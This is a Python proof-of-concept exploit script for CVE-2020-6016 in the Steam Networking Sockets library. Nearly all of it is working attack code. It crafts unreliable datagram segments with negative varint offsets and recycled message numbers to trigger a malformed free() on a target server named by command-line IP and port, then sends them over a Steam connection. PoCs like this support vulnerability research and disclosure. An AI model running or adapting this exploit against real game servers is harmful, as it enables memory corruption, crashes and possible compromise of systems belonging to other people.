#/usr/bin/python3

from elementals import Prompter, ProgressBar
import logging
import sys
import socket
import struct
import random
import time

import steam_networking_sockets

####################
# Config Variables #
####################

VULNERABILITY_ID    = "CVE-2020-6016 - 32 bits"
VULNERABILITY_DESC  = "Malform free() whan handling negative offsets in unreliable datagrams"

ENCRYPTION_TYPE     = True

####################
# Global Variables #
####################

logger = None

##
# Trigger the vulnerability
##
def startExploit(socket_fd):
    #######################
    # Unreliable segments #
    #######################
    msg  = bytearray()
    # 1st unreliable segment to allow for a liberal 2nd segment in a same packet
    msg += struct.pack("B", 0x0 | 0x10 | 0x8)                   # nFrameType = simple unreliable segment, with a message number mask of 32 bits and a negative offset
    msg += struct.pack("<L", 0x00000001)                        # nLowerBits = msg number
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 1
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    msg += struct.pack("B", 0x2)                                # size
    msg += b'A' * 0x2
    # 20 more unreliable segments with the same msg id, so to purge them outside the map
    for i in range(20):
        msg += struct.pack("B", 0x0 | 0x10 | 0x8)               # nFrameType = simple unreliable segment, with a dynamic msg id offset and a negative offset
        # Varint for the msg number (using 0, to recycle the same id)
        msg += struct.pack("B", 0)
        # Varint for the nOffset (any negative value will do)
        wanted_offset = 2 ** 32 - 1 - (i + 1)
        while wanted_offset > 0:
            next_value = wanted_offset >> 7
            msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
            wanted_offset = next_value
        msg += struct.pack("B", 0x2)                            # size
        msg += b'A' * 0x2
    # 22th unreliable segment so to set the record high message id
    msg += struct.pack("B", 0x0 | 0x10 | 0x8)                   # nFrameType = controllable msg number offset with a negative offset
    # Varint for the msg number
    wanted_msg_num = 0x400 - 1
    while wanted_msg_num > 0:
        next_value = wanted_msg_num >> 7
        msg += struct.pack("B", (wanted_msg_num & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_msg_num = next_value
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 1
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    msg += struct.pack("B", 0x2)                                # size
    msg += b'B' * 0x2
    # 20 more unreliable segments with the same msg id, so to purge them outside the map
    for i in range(20):
        msg += struct.pack("B", 0x0 | 0x10 | 0x8)               # nFrameType = simple unreliable segment, with a dynamic msg id offset and a negative offset
        # Varint for the msg number (using 0, to recycle the same id)
        msg += struct.pack("B", 0)
        # Varint for the nOffset (any negative value will do)
        wanted_offset = 2 ** 32 - 1 - (i + 1)
        while wanted_offset > 0:
            next_value = wanted_offset >> 7
            msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
            wanted_offset = next_value
        msg += struct.pack("B", 0x2)                            # size
        msg += b'B' * 0x2
    # send all segments in a single message
    steam_networking_sockets.connectionSend(socket_fd, msg)

    msg  = bytearray()
    # 1st unreliable segment
    msg += struct.pack("B", 0x0 | 0x8)                          # nFrameType = simple unreliable segment with a negative offset
    msg += struct.pack("<H", 0x0001)                            # nLowerBits = msg number
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 3
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    msg += struct.pack("B", 0x20)                               # size
    msg += b'C' * 0x20
    # 20 more unreliable segments with the same msg id, so to purge them outside the map
    for i in range(20):
        msg += struct.pack("B", 0x0 | 0x10 | 0x8)               # nFrameType = simple unreliable segment, with a dynamic msg id offset and a negative offset
        # Varint for the msg number (using 0, to recycle the same id)
        msg += struct.pack("B", 0)
        # Varint for the nOffset (any negative value will do)
        wanted_offset = 2 ** 32 - 3 - (i + 1)
        while wanted_offset > 0:
            next_value = wanted_offset >> 7
            msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
            wanted_offset = next_value
        msg += struct.pack("B", 0x2)                            # size
        msg += b'C' * 0x2
    # 21st unreliable segment
    msg += struct.pack("B", 7 | 0x20 | 0x10 | 0x8)  # nFrameType = 0x07 and bLast = True and we have a varint msg offset + nOffset
    # Varint for the msg number (we aim at 1)
    wanted_msg_num = 2 ** 32
    while wanted_msg_num > 0:
        next_value = wanted_msg_num >> 7
        msg += struct.pack("B", (wanted_msg_num & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_msg_num = next_value
    # Varint for the nOffset (any negative value will do)
    wanted_offset = 2 ** 32 - 4
    while wanted_offset > 0:
        next_value = wanted_offset >> 7
        msg += struct.pack("B", (wanted_offset & 0x7F) | (0x80 if next_value != 0 else 0x00))
        wanted_offset = next_value
    # some payload
    msg += b'9' * 0x400
    # send all segments in a single message
    logger.info("Triggering the malform free()")
    steam_networking_sockets.connectionSend(socket_fd, msg)

##
# Prints the usage instructions
##
def printUsage(args):
    print(f"Usage: {args[0]} <server_ip> <server port>")
    print("Exiting")
    exit(1)

##
# Main function (example)
##
def main(args):
    global logger
    # Check the arguments
    if len(args) != 1 + 2:
        print(f"Wrong amount of arguments, got {len(args) - 1}, expected 2.")
        printUsage(args)

    # parse the args
    server_ip   = args[1]
    server_port = int(args[2])

    # open the log
    logger = Prompter(f"Exploit PoC - {VULNERABILITY_ID}", [("exploit_poc.log", "w", logging.INFO)], min_log_level=logging.INFO)
    logger.info("Starting the exploit PoC:")
    logger.addIndent()
    logger.info(VULNERABILITY_ID)
    logger.info(VULNERABILITY_DESC)
    logger.removeIndent()

    # create a Steam Sockets connection
    socket_fd = steam_networking_sockets.createSteamConnection(server_ip, server_port, ENCRYPTION_TYPE, logger)

    # start the attack
    startExploit(socket_fd)

    logger.info("Finished Successfully")

if __name__ == "__main__":
    main(sys.argv)
